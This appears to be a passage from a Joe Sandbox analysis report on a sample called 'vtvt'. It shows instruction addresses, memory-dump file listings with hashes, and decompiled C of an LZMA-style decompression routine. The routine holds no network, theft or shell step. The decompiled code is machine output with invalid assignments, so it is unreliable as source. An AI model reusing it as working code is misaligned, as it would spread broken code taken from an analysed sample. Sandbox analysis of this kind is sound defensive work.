                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x004075e5
                                                                                    0x004075eb
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 98%
                                                                                    			E00406FFE() {
                                                                                    				signed int _t539;
                                                                                    				unsigned short _t540;
                                                                                    				signed int _t541;
                                                                                    				void _t542;
                                                                                    				signed int _t543;
                                                                                    				signed int _t544;
                                                                                    				signed int _t573;
                                                                                    				signed int _t576;
                                                                                    				signed int _t597;
                                                                                    				signed int* _t614;
                                                                                    				void* _t621;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					if( *(_t621 - 0x40) != 1) {
                                                                                    						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                    						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                    						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                    						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                    						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                    						_t539 =  *(_t621 - 4) + 0x664;
                                                                                    						 *(_t621 - 0x58) = _t539;
                                                                                    						goto L68;
                                                                                    					} else {
                                                                                    						 *(__ebp - 0x84) = 8;
                                                                                    						while(1) {
                                                                                    							L132:
                                                                                    							 *(_t621 - 0x54) = _t614;
                                                                                    							while(1) {
                                                                                    								L133:
                                                                                    								_t540 =  *_t614;
                                                                                    								_t597 = _t540 & 0x0000ffff;
                                                                                    								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                    								if( *(_t621 - 0xc) >= _t573) {
                                                                                    									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                    									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                    									 *(_t621 - 0x40) = 1;
                                                                                    									_t541 = _t540 - (_t540 >> 5);
                                                                                    									 *_t614 = _t541;
                                                                                    								} else {
                                                                                    									 *(_t621 - 0x10) = _t573;
                                                                                    									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                    									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                    								}
                                                                                    								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                    									goto L139;
                                                                                    								}
                                                                                    								L137:
                                                                                    								if( *(_t621 - 0x6c) == 0) {
                                                                                    									 *(_t621 - 0x88) = 5;
                                                                                    									L170:
                                                                                    									_t576 = 0x22;
                                                                                    									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                    									_t544 = 0;
                                                                                    									L172:
                                                                                    									return _t544;
                                                                                    								}
                                                                                    								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                    								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                    								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                    								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                    								L139:
                                                                                    								_t542 =  *(_t621 - 0x84);
                                                                                    								while(1) {
                                                                                    									 *(_t621 - 0x88) = _t542;
                                                                                    									while(1) {
                                                                                    										L1:
                                                                                    										_t543 =  *(_t621 - 0x88);
                                                                                    										if(_t543 > 0x1c) {
                                                                                    											break;
                                                                                    										}
                                                                                    										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                                                    											case 0:
                                                                                    												if( *(_t621 - 0x6c) == 0) {
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                    												_t543 =  *( *(_t621 - 0x70));
                                                                                    												if(_t543 > 0xe1) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												_t547 = _t543 & 0x000000ff;
                                                                                    												_push(0x2d);
                                                                                    												asm("cdq");
                                                                                    												_pop(_t578);
                                                                                    												_push(9);
                                                                                    												_pop(_t579);
                                                                                    												_t617 = _t547 / _t578;
                                                                                    												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                    												asm("cdq");
                                                                                    												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                    												 *(_t621 - 0x3c) = _t612;
                                                                                    												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                    												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                    												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                    												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                    													L10:
                                                                                    													if(_t620 == 0) {
                                                                                    														L12:
                                                                                    														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                    														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                    														goto L15;
                                                                                    													} else {
                                                                                    														goto L11;
                                                                                    													}
                                                                                    													do {
                                                                                    														L11:
                                                                                    														_t620 = _t620 - 1;
                                                                                    														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                    													} while (_t620 != 0);
                                                                                    													goto L12;
                                                                                    												}
                                                                                    												if( *(_t621 - 4) != 0) {
                                                                                    													GlobalFree( *(_t621 - 4));
                                                                                    												}
                                                                                    												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    												 *(_t621 - 4) = _t543;
                                                                                    												if(_t543 == 0) {
                                                                                    													goto L171;
                                                                                    												} else {
                                                                                    													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                    													goto L10;
                                                                                    												}
                                                                                    											case 1:
                                                                                    												L13:
                                                                                    												__eflags =  *(_t621 - 0x6c);
                                                                                    												if( *(_t621 - 0x6c) == 0) {
                                                                                    													 *(_t621 - 0x88) = 1;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                    												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                    												_t45 = _t621 - 0x48;
                                                                                    												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                    												__eflags =  *_t45;
                                                                                    												L15:
                                                                                    												if( *(_t621 - 0x48) < 4) {
                                                                                    													goto L13;
                                                                                    												}
                                                                                    												_t555 =  *(_t621 - 0x40);
                                                                                    												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                    													L20:
                                                                                    													 *(_t621 - 0x48) = 5;
                                                                                    													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                    													goto L23;
                                                                                    												}
                                                                                    												 *(_t621 - 0x74) = _t555;
                                                                                    												if( *(_t621 - 8) != 0) {
                                                                                    													GlobalFree( *(_t621 - 8));
                                                                                    												}
                                                                                    												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                    												 *(_t621 - 8) = _t543;
                                                                                    												if(_t543 == 0) {
                                                                                    													goto L171;
                                                                                    												} else {
                                                                                    													goto L20;
                                                                                    												}
                                                                                    											case 2:
                                                                                    												L24:
                                                                                    												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                    												 *(_t621 - 0x84) = 6;
                                                                                    												 *(_t621 - 0x4c) = _t562;
                                                                                    												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                    												goto L132;
                                                                                    											case 3:
                                                                                    												L21:
                                                                                    												__eflags =  *(_t621 - 0x6c);
                                                                                    												if( *(_t621 - 0x6c) == 0) {
                                                                                    													 *(_t621 - 0x88) = 3;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                    												_t67 = _t621 - 0x70;
                                                                                    												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                    												__eflags =  *_t67;
                                                                                    												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                    												L23:
                                                                                    												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                    												if( *(_t621 - 0x48) != 0) {
                                                                                    													goto L21;
                                                                                    												}
                                                                                    												goto L24;
                                                                                    											case 4:
                                                                                    												L133:
                                                                                    												_t540 =  *_t614;
                                                                                    												_t597 = _t540 & 0x0000ffff;
                                                                                    												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                    												if( *(_t621 - 0xc) >= _t573) {
                                                                                    													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                    													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                    													 *(_t621 - 0x40) = 1;
                                                                                    													_t541 = _t540 - (_t540 >> 5);
                                                                                    													 *_t614 = _t541;
                                                                                    												} else {
                                                                                    													 *(_t621 - 0x10) = _t573;
                                                                                    													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                    													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                    												}
                                                                                    												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                    													goto L139;
                                                                                    												}
                                                                                    											case 5:
                                                                                    												goto L137;
                                                                                    											case 6:
                                                                                    												__edx = 0;
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x34) = 1;
                                                                                    													 *(__ebp - 0x84) = 7;
                                                                                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                    													L132:
                                                                                    													 *(_t621 - 0x54) = _t614;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    												__esi =  *(__ebp - 0x60);
                                                                                    												__cl = 8;
                                                                                    												__cl = 8 -  *(__ebp - 0x3c);
                                                                                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    												__ecx =  *(__ebp - 0x3c);
                                                                                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    												__ecx =  *(__ebp - 4);
                                                                                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    												__eflags =  *(__ebp - 0x38) - 4;
                                                                                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    												if( *(__ebp - 0x38) >= 4) {
                                                                                    													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                    													if( *(__ebp - 0x38) >= 0xa) {
                                                                                    														_t98 = __ebp - 0x38;
                                                                                    														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                    														__eflags =  *_t98;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    													}
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x38) = 0;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                    												if( *(__ebp - 0x34) == __edx) {
                                                                                    													__ebx = 0;
                                                                                    													__ebx = 1;
                                                                                    													goto L61;
                                                                                    												} else {
                                                                                    													__eax =  *(__ebp - 0x14);
                                                                                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    													__eflags = __eax -  *(__ebp - 0x74);
                                                                                    													if(__eax >=  *(__ebp - 0x74)) {
                                                                                    														__eax = __eax +  *(__ebp - 0x74);
                                                                                    														__eflags = __eax;
                                                                                    													}
                                                                                    													__ecx =  *(__ebp - 8);
                                                                                    													__ebx = 0;
                                                                                    													__ebx = 1;
                                                                                    													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    													goto L41;
                                                                                    												}
                                                                                    											case 7:
                                                                                    												goto L0;
                                                                                    											case 8:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x84) = 0xa;
                                                                                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                    												} else {
                                                                                    													__eax =  *(__ebp - 0x38);
                                                                                    													__ecx =  *(__ebp - 4);
                                                                                    													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                    													 *(__ebp - 0x84) = 9;
                                                                                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                    												}
                                                                                    												while(1) {
                                                                                    													L132:
                                                                                    													 *(_t621 - 0x54) = _t614;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    											case 9:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													goto L89;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x60);
                                                                                    												if( *(__ebp - 0x60) == 0) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												__eax = 0;
                                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                                    												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    												__eflags = _t258;
                                                                                    												0 | _t258 = _t258 + _t258 + 9;
                                                                                    												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                    												goto L75;
                                                                                    											case 0xa:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x84) = 0xb;
                                                                                    													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                    													while(1) {
                                                                                    														L132:
                                                                                    														 *(_t621 - 0x54) = _t614;
                                                                                    														goto L133;
                                                                                    													}
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x28);
                                                                                    												goto L88;
                                                                                    											case 0xb:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__ecx =  *(__ebp - 0x24);
                                                                                    													__eax =  *(__ebp - 0x20);
                                                                                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    												} else {
                                                                                    													__eax =  *(__ebp - 0x24);
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x28);
                                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    												L88:
                                                                                    												__ecx =  *(__ebp - 0x2c);
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    												L89:
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												 *(__ebp - 0x80) = 0x15;
                                                                                    												__eax =  *(__ebp - 4) + 0xa68;
                                                                                    												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                    												goto L68;
                                                                                    											case 0xc:
                                                                                    												L99:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xc;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t334 = __ebp - 0x70;
                                                                                    												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t334;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												goto L101;
                                                                                    											case 0xd:
                                                                                    												L37:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xd;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t122 = __ebp - 0x70;
                                                                                    												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t122;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												L39:
                                                                                    												__eax =  *(__ebp - 0x40);
                                                                                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    													goto L48;
                                                                                    												}
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													goto L54;
                                                                                    												}
                                                                                    												L41:
                                                                                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    												__ecx =  *(__ebp - 0x58);
                                                                                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    												 *(__ebp - 0x48) = __eax;
                                                                                    												__eax = __eax + 1;
                                                                                    												__eax = __eax << 8;
                                                                                    												__eax = __eax + __ebx;
                                                                                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edx = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													 *(__ebp - 0x40) = 1;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eflags = __eax;
                                                                                    													__ebx = __ebx + __ebx + 1;
                                                                                    													 *__esi = __ax;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edx;
                                                                                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													goto L39;
                                                                                    												} else {
                                                                                    													goto L37;
                                                                                    												}
                                                                                    											case 0xe:
                                                                                    												L46:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xe;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t156 = __ebp - 0x70;
                                                                                    												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t156;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												while(1) {
                                                                                    													L48:
                                                                                    													__eflags = __ebx - 0x100;
                                                                                    													if(__ebx >= 0x100) {
                                                                                    														break;
                                                                                    													}
                                                                                    													__eax =  *(__ebp - 0x58);
                                                                                    													__edx = __ebx + __ebx;
                                                                                    													__ecx =  *(__ebp - 0x10);
                                                                                    													__esi = __edx + __eax;
                                                                                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    													__ax =  *__esi;
                                                                                    													 *(__ebp - 0x54) = __esi;
                                                                                    													__edi = __ax & 0x0000ffff;
                                                                                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    													if( *(__ebp - 0xc) >= __ecx) {
                                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    														__cx = __ax;
                                                                                    														_t170 = __edx + 1; // 0x1
                                                                                    														__ebx = _t170;
                                                                                    														__cx = __ax >> 5;
                                                                                    														__eflags = __eax;
                                                                                    														 *__esi = __ax;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x10) = __ecx;
                                                                                    														0x800 = 0x800 - __edi;
                                                                                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    														__ebx = __ebx + __ebx;
                                                                                    														 *__esi = __cx;
                                                                                    													}
                                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    														continue;
                                                                                    													} else {
                                                                                    														goto L46;
                                                                                    													}
                                                                                    												}
                                                                                    												L54:
                                                                                    												_t173 = __ebp - 0x34;
                                                                                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    												__eflags =  *_t173;
                                                                                    												goto L55;
                                                                                    											case 0xf:
                                                                                    												L58:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xf;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t203 = __ebp - 0x70;
                                                                                    												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t203;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												L60:
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													L55:
                                                                                    													__al =  *(__ebp - 0x44);
                                                                                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    													goto L56;
                                                                                    												}
                                                                                    												L61:
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												__edx = __ebx + __ebx;
                                                                                    												__ecx =  *(__ebp - 0x10);
                                                                                    												__esi = __edx + __eax;
                                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edi = __ax & 0x0000ffff;
